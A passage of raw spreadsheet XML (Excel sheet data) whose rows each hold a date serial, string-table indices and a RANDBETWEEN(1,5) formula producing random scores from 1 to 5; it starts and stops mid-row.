        <v>6</v>
      </c>
      <c r="D12685" t="s">
        <v>25</v>
      </c>
      <c r="E12685" t="s">
        <v>11365</v>
      </c>
      <c r="F12685">
        <f t="shared" ca="1" si="198"/>
        <v>5</v>
      </c>
    </row>
    <row r="12686" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12686" s="1">
        <v>43292.378252314818</v>
      </c>
      <c r="C12686" t="s">
        <v>6</v>
      </c>
      <c r="D12686" t="s">
        <v>25</v>
      </c>
      <c r="E12686" s="2" t="s">
        <v>11366</v>
      </c>
      <c r="F12686">
        <f t="shared" ca="1" si="198"/>
        <v>2</v>
      </c>
    </row>
    <row r="12687" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12687" s="1">
        <v>43292.371574074074</v>
      </c>
      <c r="C12687" t="s">
        <v>71</v>
      </c>
      <c r="E12687" s="2" t="s">
        <v>11367</v>
      </c>
      <c r="F12687">
        <f t="shared" ca="1" si="198"/>
        <v>4</v>
      </c>
    </row>
    <row r="12688" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12688" s="1">
        <v>43292.369826388887</v>
      </c>
      <c r="C12688" t="s">
        <v>48</v>
      </c>
      <c r="E12688" t="s">
        <v>11368</v>
      </c>
      <c r="F12688">
        <f t="shared" ca="1" si="198"/>
        <v>3</v>
      </c>
    </row>
    <row r="12689" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12689" s="1">
        <v>43292.361168981479</v>
      </c>
      <c r="C12689" t="s">
        <v>10</v>
      </c>
      <c r="D12689" t="s">
        <v>158</v>
      </c>
      <c r="E12689" t="s">
        <v>11369</v>
      </c>
      <c r="F12689">
        <f t="shared" ca="1" si="198"/>
        <v>2</v>
      </c>
    </row>
    <row r="12690" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A12690" s="1">
        <v>43292.353981481479</v>
      </c>
      <c r="C12690" t="s">
        <v>226</v>
      </c>
      <c r="D12690" t="s">
        <v>71</v>
      </c>
      <c r="E12690" s="2" t="s">
        <v>11370</v>
      </c>
      <c r="F12690">
        <f t="shared" ca="1" si="198"/>
        <v>5</v>
      </c>
    </row>
    <row r="12691" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12691" s="1">
        <v>43292.35324074074</v>
      </c>
      <c r="C12691" t="s">
        <v>48</v>
      </c>
      <c r="E12691" s="2" t="s">
        <v>11371</v>
      </c>
      <c r="F12691">
        <f t="shared" ca="1" si="198"/>
        <v>2</v>
      </c>
    </row>
    <row r="12692" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12692" s="1">
        <v>43292.324560185189</v>
      </c>
      <c r="C12692" t="s">
        <v>60</v>
      </c>
      <c r="D12692" t="s">
        <v>33</v>
      </c>
      <c r="E12692" t="s">
        <v>10507</v>
      </c>
      <c r="F12692">
        <f t="shared" ca="1" si="198"/>
        <v>2</v>
      </c>
    </row>
    <row r="12693" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12693" s="1">
        <v>43292.300115740742</v>
      </c>
      <c r="C12693" t="s">
        <v>48</v>
      </c>
      <c r="E12693" s="2" t="s">
        <v>11372</v>
      </c>
      <c r="F12693">
        <f t="shared" ca="1" si="198"/>
        <v>1</v>
      </c>
    </row>
    <row r="12694" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12694" s="1">
        <v>43292.296631944446</v>
      </c>
      <c r="C12694" t="s">
        <v>60</v>
      </c>
      <c r="E12694" t="s">
        <v>11373</v>
      </c>
      <c r="F12694">
        <f t="shared" ca="1" si="198"/>
        <v>3</v>
      </c>
    </row>
    <row r="12695" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A12695" s="1">
        <v>43292.285590277781</v>
      </c>
      <c r="C12695" t="s">
        <v>907</v>
      </c>
      <c r="E12695" s="2" t="s">
        <v>11374</v>
      </c>
      <c r="F12695">
        <f t="shared" ca="1" si="198"/>
        <v>3</v>
      </c>
    </row>
    <row r="12696" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A12696" s="1">
        <v>43292.284687500003</v>
      </c>
      <c r="C12696" t="s">
        <v>817</v>
      </c>
      <c r="D12696" t="s">
        <v>721</v>
      </c>
      <c r="E12696" s="2" t="s">
        <v>11375</v>
      </c>
      <c r="F12696">
        <f t="shared" ca="1" si="198"/>
        <v>4</v>
      </c>
    </row>
    <row r="12697" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A12697" s="1">
        <v>43292.266585648147</v>
      </c>
      <c r="C12697" t="s">
        <v>41</v>
      </c>
      <c r="E12697" s="2" t="s">
        <v>11376</v>
      </c>
      <c r="F12697">
        <f t="shared" ca="1" si="198"/>
        <v>2</v>
      </c>
    </row>
    <row r="12698" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12698" s="1">
        <v>43292.2341087963</v>
      </c>
      <c r="C12698" t="s">
        <v>173</v>
      </c>
      <c r="E12698" s="2" t="s">
        <v>11377</v>
      </c>
      <c r="F12698">
        <f t="shared" ca="1" si="198"/>
        <v>2</v>
      </c>
    </row>
    <row r="12699" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12699" s="1">
        <v>43292.225590277776</v>
      </c>
      <c r="C12699" t="s">
        <v>226</v>
      </c>
      <c r="E12699" t="s">
        <v>11378</v>
      </c>
      <c r="F12699">
        <f t="shared" ca="1" si="198"/>
        <v>2</v>
      </c>
    </row>
    <row r="12700" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12700" s="1">
        <v>43292.223900462966</v>
      </c>
      <c r="C12700" t="s">
        <v>41</v>
      </c>
      <c r="E12700" t="s">
        <v>11379</v>
      </c>
      <c r="F12700">
        <f t="shared" ca="1" si="198"/>
        <v>4</v>
      </c>
    </row>
    <row r="12701" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A12701" s="1">
        <v>43292.215451388889</v>
      </c>
      <c r="C12701" t="s">
        <v>65</v>
      </c>
      <c r="E12701" s="2" t="s">
        <v>11380</v>
      </c>
      <c r="F12701">
        <f t="shared" ca="1" si="198"/>
        <v>1</v>
      </c>
    </row>
    <row r="12702" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12702" s="1">
        <v>43292.145937499998</v>
      </c>
      <c r="C12702" t="s">
        <v>73</v>
      </c>
      <c r="E12702" t="s">
        <v>11381</v>
      </c>
      <c r="F12702">
        <f t="shared" ca="1" si="198"/>
        <v>1</v>
      </c>
    </row>
    <row r="12703" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12703" s="1">
        <v>43292.139374999999</v>
      </c>
      <c r="C12703" t="s">
        <v>9575</v>
      </c>
      <c r="D12703" t="s">
        <v>20</v>
      </c>
      <c r="E12703" t="s">
        <v>10507</v>
      </c>
      <c r="F12703">
        <f t="shared" ca="1" si="198"/>
        <v>3</v>
      </c>
    </row>
    <row r="12704" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12704" s="1">
        <v>43292.132222222222</v>
      </c>
      <c r="C12704" t="s">
        <v>48</v>
      </c>
      <c r="E12704" s="2" t="s">
        <v>11382</v>
      </c>
      <c r="F12704">
        <f t="shared" ca="1" si="198"/>
        <v>4</v>
      </c>
    </row>
    <row r="12705" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12705" s="1">
        <v>43292.055520833332</v>
      </c>
      <c r="C12705" t="s">
        <v>140</v>
      </c>
      <c r="D12705" t="s">
        <v>234</v>
      </c>
      <c r="E12705" s="2" t="s">
        <v>11383</v>
      </c>
      <c r="F12705">
        <f t="shared" ca="1" si="198"/>
        <v>5</v>
      </c>
    </row>
    <row r="12706" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12706" s="1">
        <v>43292.025960648149</v>
      </c>
      <c r="C12706" t="s">
        <v>65</v>
      </c>
      <c r="E12706" t="s">
        <v>6496</v>
      </c>
      <c r="F12706">
        <f t="shared" ca="1" si="198"/>
        <v>4</v>
      </c>
    </row>
    <row r="12707" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12707" s="1">
        <v>43292.001689814817</v>
      </c>
      <c r="C12707" t="s">
        <v>73</v>
      </c>
      <c r="E12707" t="s">
        <v>11384</v>
      </c>
      <c r="F12707">
        <f t="shared" ca="1" si="198"/>
        <v>2</v>
      </c>
    </row>
    <row r="12708" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12708" s="1">
        <v>43291.836423611108</v>
      </c>
      <c r="C12708" t="s">
        <v>258</v>
      </c>
      <c r="D12708" t="s">
        <v>271</v>
      </c>
      <c r="E12708" s="2" t="s">
        <v>11385</v>
      </c>
      <c r="F12708">
        <f t="shared" ca="1" si="198"/>
        <v>1</v>
      </c>
    </row>
    <row r="12709" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12709" s="1">
        <v>43291.742303240739</v>
      </c>
      <c r="C12709" t="s">
        <v>10</v>
      </c>
      <c r="D12709" t="s">
        <v>80</v>
      </c>
      <c r="E12709" s="2" t="s">
        <v>11386</v>
      </c>
      <c r="F12709">
        <f t="shared" ca="1" si="198"/>
        <v>3</v>
      </c>
    </row>
    <row r="12710" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A12710" s="1">
        <v>43291.718807870369</v>
      </c>
      <c r="C12710" t="s">
        <v>258</v>
      </c>
      <c r="D12710" t="s">
        <v>46</v>
      </c>
      <c r="E12710" s="2" t="s">
        <v>11387</v>
      </c>
      <c r="F12710">
        <f t="shared" ca="1" si="198"/>
        <v>4</v>
      </c>
    </row>
    <row r="12711" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12711" s="1">
        <v>43291.700844907406</v>
      </c>
      <c r="C12711" t="s">
        <v>10</v>
      </c>
      <c r="D12711" t="s">
        <v>163</v>
      </c>
      <c r="E12711" t="s">
        <v>11388</v>
      </c>
      <c r="F12711">
        <f t="shared" ca="1" si="198"/>
        <v>2</v>
      </c>
    </row>
    <row r="12712" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A12712" s="1">
        <v>43291.697951388887</v>
      </c>
      <c r="C12712" t="s">
        <v>6663</v>
      </c>
      <c r="D12712" t="s">
        <v>750</v>
      </c>
      <c r="E12712" s="2" t="s">
        <v>11389</v>
      </c>
      <c r="F12712">
        <f t="shared" ca="1" si="198"/>
        <v>5</v>
      </c>
    </row>
    <row r="12713" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12713" s="1">
        <v>43291.694305555553</v>
      </c>
      <c r="C12713" t="s">
        <v>16</v>
      </c>
      <c r="E12713" s="2" t="s">
        <v>11390</v>
      </c>
      <c r="F12713">
        <f t="shared" ca="1" si="198"/>
        <v>4</v>
      </c>
    </row>
    <row r="12714" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12714" s="1">
        <v>43291.690335648149</v>
      </c>
      <c r="C12714" t="s">
        <v>10</v>
      </c>
      <c r="D12714" t="s">
        <v>52</v>
      </c>
      <c r="E12714" t="s">
        <v>11391</v>
      </c>
      <c r="F12714">
        <f t="shared" ca="1" si="198"/>
        <v>1</v>
      </c>
    </row>
    <row r="12715" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12715" s="1">
        <v>43291.670497685183</v>
      </c>
      <c r="C12715" t="s">
        <v>6</v>
      </c>
      <c r="D12715" t="s">
        <v>25</v>
      </c>
      <c r="E12715" t="s">
        <v>11392</v>
      </c>
      <c r="F12715">
        <f t="shared" ca="1" si="198"/>
        <v>5</v>
      </c>
    </row>
    <row r="12716" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12716" s="1">
        <v>43291.634942129633</v>
      </c>
      <c r="C12716" t="s">
        <v>10</v>
      </c>
      <c r="D12716" t="s">
        <v>36</v>
      </c>
      <c r="E12716" t="s">
        <v>11393</v>
      </c>
      <c r="F12716">
        <f t="shared" ca="1" si="198"/>
        <v>4</v>
      </c>
    </row>
    <row r="12717" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12717" s="1">
        <v>43291.607303240744</v>
      </c>
      <c r="C12717" t="s">
        <v>16</v>
      </c>
      <c r="F12717">
        <f t="shared" ca="1" si="198"/>
        <v>5</v>
      </c>
    </row>
    <row r="12718" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12718" s="1">
        <v>43291.606041666666</v>
      </c>
      <c r="C12718" t="s">
        <v>6</v>
      </c>
      <c r="D12718" t="s">
        <v>821</v>
      </c>
      <c r="E12718" t="s">
        <v>11394</v>
      </c>
      <c r="F12718">
        <f t="shared" ca="1" si="198"/>
        <v>5</v>
      </c>
    </row>
    <row r="12719" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12719" s="1">
        <v>43291.595567129632</v>
      </c>
      <c r="C12719" t="s">
        <v>10</v>
      </c>
      <c r="D12719" t="s">
        <v>52</v>
      </c>
      <c r="E12719" t="s">
        <v>11395</v>
      </c>
      <c r="F12719">
        <f t="shared" ca="1" si="198"/>
        <v>3</v>
      </c>
    </row>
    <row r="12720" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12720" s="1">
        <v>43291.577164351853</v>
      </c>
      <c r="C12720" t="s">
        <v>6</v>
      </c>
      <c r="D12720" t="s">
        <v>821</v>
      </c>
      <c r="E12720" t="s">
        <v>11396</v>
      </c>
      <c r="F12720">
        <f t="shared" ca="1" si="198"/>
        <v>2</v>
      </c>
    </row>
    <row r="12721" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12721" s="1">
        <v>43291.5700462963</v>
      </c>
      <c r="C12721" t="s">
        <v>10</v>
      </c>
      <c r="D12721" t="s">
        <v>89</v>
      </c>
      <c r="E12721" t="s">
        <v>11397</v>
      </c>
      <c r="F12721">
        <f t="shared" ca="1" si="198"/>
        <v>4</v>
      </c>
    </row>
    <row r="12722" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12722" s="1">
        <v>43291.519988425927</v>
      </c>
      <c r="C12722" t="s">
        <v>10</v>
      </c>
      <c r="D12722" t="s">
        <v>6</v>
      </c>
      <c r="E12722" t="s">
        <v>11398</v>
      </c>
      <c r="F12722">
        <f t="shared" ca="1" si="198"/>
        <v>4</v>
      </c>
    </row>
    <row r="12723" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12723" s="1">
        <v>43291.495312500003</v>
      </c>
      <c r="C12723" t="s">
        <v>10</v>
      </c>
      <c r="D12723" t="s">
        <v>163</v>
      </c>
      <c r="E12723" t="s">
        <v>11399</v>
      </c>
      <c r="F12723">
        <f t="shared" ca="1" si="198"/>
        <v>3</v>
      </c>
    </row>
    <row r="12724" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12724" s="1">
        <v>43291.494618055556</v>
      </c>
      <c r="C12724" t="s">
        <v>43</v>
      </c>
      <c r="E12724" t="s">
        <v>11400</v>
      </c>
      <c r="F12724">
        <f t="shared" ca="1" si="198"/>
        <v>2</v>
      </c>
    </row>
    <row r="12725" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A12725" s="1">
        <v>43291.492627314816</v>
      </c>
      <c r="C12725" t="s">
        <v>667</v>
      </c>
      <c r="D12725" t="s">
        <v>271</v>
      </c>
      <c r="E12725" s="2" t="s">
        <v>11401</v>
      </c>
      <c r="F12725">
        <f t="shared" ca="1" si="198"/>
        <v>3</v>
      </c>
    </row>
    <row r="12726" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A12726" s="1">
        <v>43291.490416666667</v>
      </c>
      <c r="C12726" t="s">
        <v>6</v>
      </c>
      <c r="D12726" t="s">
        <v>25</v>
      </c>
      <c r="E12726" s="2" t="s">
        <v>11402</v>
      </c>
      <c r="F12726">
        <f t="shared" ca="1" si="198"/>
        <v>5</v>
      </c>
    </row>
    <row r="12727" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12727" s="1">
        <v>43291.4765625</v>
      </c>
      <c r="C12727" t="s">
        <v>48</v>
      </c>
      <c r="E12727" t="s">
        <v>11403</v>
      </c>
      <c r="F12727">
        <f t="shared" ca="1" si="198"/>
        <v>1</v>
      </c>
    </row>
    <row r="12728" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12728" s="1">
        <v>43291.458587962959</v>
      </c>
      <c r="C12728" t="s">
        <v>10</v>
      </c>
      <c r="D12728" t="s">
        <v>36</v>
      </c>
      <c r="E12728" s="2" t="s">
        <v>11404</v>
      </c>
      <c r="F12728">
        <f t="shared" ca="1" si="198"/>
        <v>5</v>
      </c>
    </row>
    <row r="12729" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12729" s="1">
        <v>43291.4534375</v>
      </c>
      <c r="C12729" t="s">
        <v>189</v>
      </c>
      <c r="E12729" s="2" t="s">
        <v>11405</v>
      </c>
      <c r="F12729">
        <f t="shared" ca="1" si="198"/>
        <v>5</v>
      </c>
    </row>
    <row r="12730" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12730" s="1">
        <v>43291.451157407406</v>
      </c>
      <c r="C12730" t="s">
        <v>48</v>
      </c>
      <c r="E12730" t="s">
        <v>11406</v>
      </c>
      <c r="F12730">
        <f t="shared" ca="1" si="198"/>
        <v>5</v>
      </c>
    </row>
    <row r="12731" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12731" s="1">
        <v>43291.446851851855</v>
      </c>
      <c r="C12731" t="s">
        <v>48</v>
      </c>
      <c r="E12731" t="s">
        <v>11407</v>
      </c>
      <c r="F12731">
        <f t="shared" ca="1" si="198"/>
        <v>2</v>
      </c>
    </row>
    <row r="12732" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12732" s="1">
        <v>43291.445231481484</v>
      </c>
      <c r="C12732" t="s">
        <v>222</v>
      </c>
      <c r="E12732" t="s">
        <v>11408</v>
      </c>
      <c r="F12732">
        <f t="shared" ca="1" si="198"/>
        <v>2</v>
      </c>
    </row>
    <row r="12733" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12733" s="1">
        <v>43291.445092592592</v>
      </c>
      <c r="C12733" t="s">
        <v>48</v>
      </c>
      <c r="D12733" t="s">
        <v>312</v>
      </c>
      <c r="E12733" s="2" t="s">
        <v>11409</v>
      </c>
      <c r="F12733">
        <f t="shared" ca="1" si="198"/>
        <v>4</v>
      </c>
    </row>
    <row r="12734" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12734" s="1">
        <v>43291.440879629627</v>
      </c>
      <c r="C12734" t="s">
        <v>10</v>
      </c>
      <c r="D12734" t="s">
        <v>52</v>
      </c>
      <c r="E12734" t="s">
        <v>11410</v>
      </c>
      <c r="F12734">
        <f t="shared" ca="1" si="198"/>
        <v>1</v>
      </c>
    </row>
    <row r="12735" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12735" s="1">
        <v>43291.438298611109</v>
      </c>
      <c r="C12735" t="s">
        <v>623</v>
      </c>
      <c r="E12735" s="2" t="s">
        <v>11411</v>
      </c>
      <c r="F12735">
        <f t="shared" ca="1" si="198"/>
        <v>4</v>
      </c>
    </row>
    <row r="12736" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12736" s="1">
        <v>43291.434282407405</v>
      </c>
      <c r="C12736" t="s">
        <v>10</v>
      </c>
      <c r="D12736" t="s">
        <v>271</v>
      </c>
      <c r="E12736" t="s">
        <v>11412</v>
      </c>
      <c r="F12736">
        <f t="shared" ca="1" si="198"/>
        <v>1</v>
      </c>
    </row>
    <row r="12737" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12737" s="1">
        <v>43291.433599537035</v>
      </c>
      <c r="C12737" t="s">
        <v>71</v>
      </c>
      <c r="E12737" s="2" t="s">
        <v>11413</v>
      </c>
      <c r="F12737">
        <f t="shared" ca="1" si="198"/>
        <v>2</v>
      </c>
    </row>
    <row r="12738" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12738" s="1">
        <v>43291.399618055555</v>
      </c>
      <c r="C12738" t="s">
        <v>41</v>
      </c>
      <c r="E12738" t="s">
        <v>11414</v>
      </c>
      <c r="F12738">
        <f t="shared" ref="F12738:F12801" ca="1" si="199">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="12739" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12739" s="1">
        <v>43291.397986111115</v>
      </c>
      <c r="C12739" t="s">
        <v>48</v>
      </c>
      <c r="E12739" t="s">
        <v>11415</v>
      </c>
      <c r="F12739">
        <f t="shared" ca="1" si="199"/>
        <v>2</v>
      </c>
    </row>
    <row r="12740" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A12740" s="1">
        <v>43291.392361111109</v>
      </c>
      <c r="C12740" t="s">
        <v>71</v>
      </c>
      <c r="E12740" s="2" t="s">
        <v>11416</v>
      </c>
      <c r="F12740">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12741" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12741" s="1">
        <v>43291.343449074076</v>
      </c>
      <c r="C12741" t="s">
        <v>41</v>
      </c>
      <c r="D12741" t="s">
        <v>312</v>
      </c>
      <c r="E12741" s="2" t="s">
        <v>11417</v>
      </c>
      <c r="F12741">
        <f t="shared" ca="1" si="199"/>
        <v>5</v>
      </c>
    </row>
    <row r="12742" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12742" s="1">
        <v>43291.34</v>
      </c>
      <c r="C12742" t="s">
        <v>71</v>
      </c>
      <c r="E12742" s="2" t="s">
        <v>11418</v>
      </c>
      <c r="F12742">
        <f t="shared" ca="1" si="199"/>
        <v>1</v>
      </c>
    </row>
    <row r="12743" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12743" s="1">
        <v>43291.328668981485</v>
      </c>
      <c r="C12743" t="s">
        <v>140</v>
      </c>
      <c r="D12743" t="s">
        <v>312</v>
      </c>
      <c r="E12743" t="s">
        <v>11419</v>
      </c>
      <c r="F12743">
        <f t="shared" ca="1" si="199"/>
        <v>2</v>
      </c>
    </row>
    <row r="12744" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A12744" s="1">
        <v>43291.313807870371</v>
      </c>
      <c r="C12744" t="s">
        <v>41</v>
      </c>
      <c r="E12744" s="2" t="s">
        <v>11420</v>
      </c>
      <c r="F12744">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12745" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12745" s="1">
        <v>43291.303344907406</v>
      </c>
      <c r="C12745" t="s">
        <v>10</v>
      </c>
      <c r="D12745" t="s">
        <v>163</v>
      </c>
      <c r="E12745" t="s">
        <v>11421</v>
      </c>
      <c r="F12745">
        <f t="shared" ca="1" si="199"/>
        <v>1</v>
      </c>
    </row>
    <row r="12746" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12746" s="1">
        <v>43291.2809375</v>
      </c>
      <c r="C12746" t="s">
        <v>48</v>
      </c>
      <c r="E12746" t="s">
        <v>11422</v>
      </c>
      <c r="F12746">
        <f t="shared" ca="1" si="199"/>
        <v>2</v>
      </c>
    </row>
    <row r="12747" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12747" s="1">
        <v>43291.275046296294</v>
      </c>
      <c r="C12747" t="s">
        <v>48</v>
      </c>
      <c r="D12747" t="s">
        <v>312</v>
      </c>
      <c r="E12747" t="s">
        <v>11423</v>
      </c>
      <c r="F12747">
        <f t="shared" ca="1" si="199"/>
        <v>1</v>
      </c>
    </row>
    <row r="12748" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12748" s="1">
        <v>43291.24082175926</v>
      </c>
      <c r="C12748" t="s">
        <v>3097</v>
      </c>
      <c r="D12748" t="s">
        <v>263</v>
      </c>
      <c r="E12748" s="2" t="s">
        <v>11424</v>
      </c>
      <c r="F12748">
        <f t="shared" ca="1" si="199"/>
        <v>5</v>
      </c>
    </row>
    <row r="12749" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12749" s="1">
        <v>43291.234699074077</v>
      </c>
      <c r="C12749" t="s">
        <v>41</v>
      </c>
      <c r="E12749" s="2" t="s">
        <v>11425</v>
      </c>
      <c r="F12749">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12750" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12750" s="1">
        <v>43291.205520833333</v>
      </c>
      <c r="C12750" t="s">
        <v>48</v>
      </c>
      <c r="E12750" s="2" t="s">
        <v>11426</v>
      </c>
      <c r="F12750">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12751" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12751" s="1">
        <v>43291.112916666665</v>
      </c>
      <c r="C12751" t="s">
        <v>139</v>
      </c>
      <c r="D12751" t="s">
        <v>312</v>
      </c>
      <c r="E12751" t="s">
        <v>11427</v>
      </c>
      <c r="F12751">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12752" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12752" s="1">
        <v>43291.086736111109</v>
      </c>
      <c r="C12752" t="s">
        <v>865</v>
      </c>
      <c r="D12752" t="s">
        <v>20</v>
      </c>
      <c r="E12752" t="s">
        <v>10507</v>
      </c>
      <c r="F12752">
        <f t="shared" ca="1" si="199"/>
        <v>2</v>
      </c>
    </row>
    <row r="12753" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12753" s="1">
        <v>43291.081782407404</v>
      </c>
      <c r="C12753" t="s">
        <v>41</v>
      </c>
      <c r="E12753" s="2" t="s">
        <v>11428</v>
      </c>
      <c r="F12753">
        <f t="shared" ca="1" si="199"/>
        <v>5</v>
      </c>
    </row>
    <row r="12754" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12754" s="1">
        <v>43291.015729166669</v>
      </c>
      <c r="C12754" t="s">
        <v>222</v>
      </c>
      <c r="D12754" t="s">
        <v>94</v>
      </c>
      <c r="E12754" s="2" t="s">
        <v>11429</v>
      </c>
      <c r="F12754">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12755" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A12755" s="1">
        <v>43290.962604166663</v>
      </c>
      <c r="C12755" t="s">
        <v>319</v>
      </c>
      <c r="D12755" t="s">
        <v>320</v>
      </c>
      <c r="E12755" s="2" t="s">
        <v>11430</v>
      </c>
      <c r="F12755">
        <f t="shared" ca="1" si="199"/>
        <v>5</v>
      </c>
    </row>
    <row r="12756" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12756" s="1">
        <v>43290.941678240742</v>
      </c>
      <c r="C12756" t="s">
        <v>222</v>
      </c>
      <c r="D12756" t="s">
        <v>7</v>
      </c>
      <c r="E12756" s="2" t="s">
        <v>11431</v>
      </c>
      <c r="F12756">
        <f t="shared" ca="1" si="199"/>
        <v>5</v>
      </c>
    </row>
    <row r="12757" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A12757" s="1">
        <v>43290.904699074075</v>
      </c>
      <c r="C12757" t="s">
        <v>222</v>
      </c>
      <c r="D12757" t="s">
        <v>2139</v>
      </c>
      <c r="E12757" s="2" t="s">
        <v>11432</v>
      </c>
      <c r="F12757">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12758" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12758" s="1">
        <v>43290.816145833334</v>
      </c>
      <c r="C12758" t="s">
        <v>10</v>
      </c>
      <c r="D12758" t="s">
        <v>46</v>
      </c>
      <c r="E12758" t="s">
        <v>11433</v>
      </c>
      <c r="F12758">
        <f t="shared" ca="1" si="199"/>
        <v>4</v>
      </c>
    </row>
    <row r="12759" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12759" s="1">
        <v>43290.81322916667</v>
      </c>
      <c r="C12759" t="s">
        <v>461</v>
      </c>
      <c r="D12759" t="s">
        <v>713</v>
      </c>
      <c r="E12759" t="s">
        <v>10507</v>
      </c>
      <c r="F12759">
        <f t="shared" ca="1" si="199"/>
        <v>5</v>
      </c>
    </row>
    <row r="12760" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12760" s="1">
        <v>43290.714074074072</v>
      </c>
      <c r="C12760" t="s">
        <v>6</v>
      </c>
      <c r="D12760" t="s">
        <v>25</v>
      </c>
      <c r="E12760" t="s">
        <v>11434</v>
      </c>
      <c r="F12760">
        <f t="shared" ca="1" si="199"/>
        <v>3</v>
      </c>
    </row>
    <row r="12761" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12761" s="1">
        <v>43290.703333333331</v>
      </c>
      <c r="C12761" t="s">
        <v>10</v>
      </c>
      <c r="D12761" t="s">
        <v>817</v>
      </c>
      <c r="E12761" t="s">
        <v>11435</v>
      </c>
      <c r="F12761">
        <f t="shared" ca="1" si="199"/>
        <v>5</v>
      </c>
    </row>
    <row r="12762" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12762" s="1">
        <v>43290.674444444441</v>
      </c>
      <c r="C12762" t="s">
        <v>10</v>
      </c>
      <c r="D12762" t="s">
        <v>112</v>
      </c>
      <c r="E12762" t="s">
        <v>11436</v>
      </c>
      <c r="F12762">
        <f t="shared" ca="1" si="199"/>
        <v>5</v>
      </c>
    </row>
    <row r="12763" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12763" s="1">
        <v>43290.665520833332</v>
      </c>
      <c r="C12763" t="s">
        <v>10</v>
      </c>
      <c r="D12763" t="s">
        <v>263</v>
      </c>
      <c r="E12763" t="s">
        <v>11437</v>
      </c>
      <c r="F12763">
        <f t="shared" ca="1" si="199"/>
